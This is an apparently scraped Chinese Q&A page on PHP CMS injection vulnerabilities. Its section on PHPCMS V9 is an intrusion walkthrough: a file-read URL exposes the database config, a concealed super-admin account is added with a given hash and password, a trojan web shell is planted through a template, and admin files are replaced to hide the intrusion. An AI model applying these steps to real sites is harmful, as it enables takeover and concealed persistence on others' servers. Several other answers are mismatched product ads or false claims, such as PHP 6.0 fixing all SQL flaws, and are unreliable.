本文目錄一覽:
- 1、dedecms recommend.php sql注入漏洞怎麼弄
- 2、用什麼工具檢測php網站是否存在注入漏洞?
- 3、服務器裝什麼軟件 phpcms注入漏洞
- 4、phpwind9.x和8.7XSS注入以及管理後台腳本注入漏洞
- 5、php + mysql 檢測到注入漏洞,如何注入腳本刪除數據
- 6、如何修復php 5.3.11之前版本存在多個安全漏洞
dedecms recommend.php sql注入漏洞怎麼弄
按我說的試試
可以用騰訊電腦管家進行全盤檢查,他有智能修復功能
打開騰訊電腦管家——工具箱——漏洞修復
如果它提示系統漏洞要修復,那就是應該要修復的 有的漏洞不用修復他就會忽所以不必在意!
用什麼工具檢測php網站是否存在注入漏洞?
PHP的安全性現在是越來越好了PHP6。0版本都把存在的SQL漏洞都解決了
但是為了安全起見還是應該做安全檢測
檢測方法:SQL 注入法 、腳本代碼、參數傳遞等方法 具體情況參看PHP官方網站 安全篇章
服務器裝什麼軟件 phpcms注入漏洞
本文利用了PHPCMS V9的兩個漏洞,一個是讀取任意文件漏洞,另一個是模版運行php腳本漏洞。使用到的工具:Navicat for Mysql/IE瀏覽器(建議使用代理)/湛藍v9代碼包(包含文中使用到的所有文件、代碼和木馬)
1、放置data.txt以備在目標站點讀取並在目標站點生成PHP木馬腳本使用。
例如將data.txt放置在yun.baidu.com/j0192/data.txt
2、通過v9漏洞獲取配置信息(請參閱:phpcms V9最新讀取站點任意文件漏洞)。
/index.php?m=searchc=indexa=public_get_suggest_keywordurl=asdfq=../../phpsso_server/caches/configs/database.php
3、通過v9系統漏洞獲取到的數據庫信息遠程登陸目標站點數據庫,在v9_admin和v9_sso_admin表中添加賬號
username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1
4、通過數據庫添加管理員賬號後使用以下用戶名密碼在後台登陸,然後修改當前用戶密碼。
用戶名:admn
密碼:123456
5、ctrl+a複製write.php全部內容粘貼進v9默認模版下的footer.html保存,然後點擊footer.html的可視化運行該模版中的腳本,到此時就完成在目標站點生成木馬腳本。
6、打開ifeng.com/caches/caches_template/default/wap/data.class.php
用戶名:admin
密碼:admin
7、隱藏新增加的管理員。
通過木馬腳本上傳替換/phpcms/modules/admin/admin_manage.php(默認匹配%admn%),然後登陸目標站點後台查看管理員列表是否還有用戶名為admn的超級管理員,如果沒有則表明我們完成了新加管理員的隱藏。
8、隱藏新增加的關聯鏈接
通過木馬腳本上傳替換/phpcms/modules/admin/keylink.php((默認匹配%skyhome%))
9、將目標網站的漏洞修復,以防其他黑客入侵。
通過木馬腳本上傳替換/phpcms/modules/search/index.php
防黑參考:
1、關閉數據庫遠程訪問。
2、靜態文件及附件等文件目錄禁止執行權限。
3、腳本文件目錄禁止寫權限。
4、系統後台等重要目錄限制IP訪問。
5、及時關注開源系統官方補丁升級和烏雲、sebug等漏洞發布平台,修復系統漏洞。
phpwind9.x和8.7XSS注入以及管理後台腳本注入漏洞
漏洞描述:
phpwind近期公布了2處安全漏洞,分別是富文本編輯器發帖的xss注入(受影響版本8.7、9.X)以及管理後台添加新用戶時的腳本注入(受影響版本8.7)。
影響版本:
phpwind 9.x以及8.7,8.7.1
漏洞等級:
高危
修復建議:
1、安裝官方最新補丁,官方補丁:
2、添加網站至雲觀測,及時了解網站組件突發/0day漏洞。
php + mysql 檢測到注入漏洞,如何注入腳本刪除數據
同一句語句里是不允許出現你這種格式的
如果你是有兩條語句需要依次運行,那你可以用分號隔離。
比如:
insert into article_tmp select * from article;
delete from article;
不過你這兩句語句有嚴重的邏輯性問題
delete from article;這句已經把article表裡的數據都刪了。你緊接着要select * from article,那你返回的肯定是空值,都被你前一句刪了。
如何修復php 5.3.11之前版本存在多個安全漏洞
打開騰訊電腦管家——工具箱——修復漏洞,進行漏洞掃描和修復。
建議設置開啟自動修復漏洞功能,開啟後,電腦管家可以在發現高危漏洞(僅包括高危漏洞,不包括其它漏洞)時,第一時間自動進行修復,無需用戶參與,最大程度保證用戶電腦安全。尤其適合老人、小孩或計算機初級水平用戶使用。開啟方式如下:進入電腦管家“修復漏洞”模塊—“設置”,點擊開啟自動修復漏洞即可。
原創文章,作者:PGIZ,如若轉載,請註明出處:https://www.506064.com/zh-hant/n/143147.html
微信掃一掃 
支付寶掃一掃 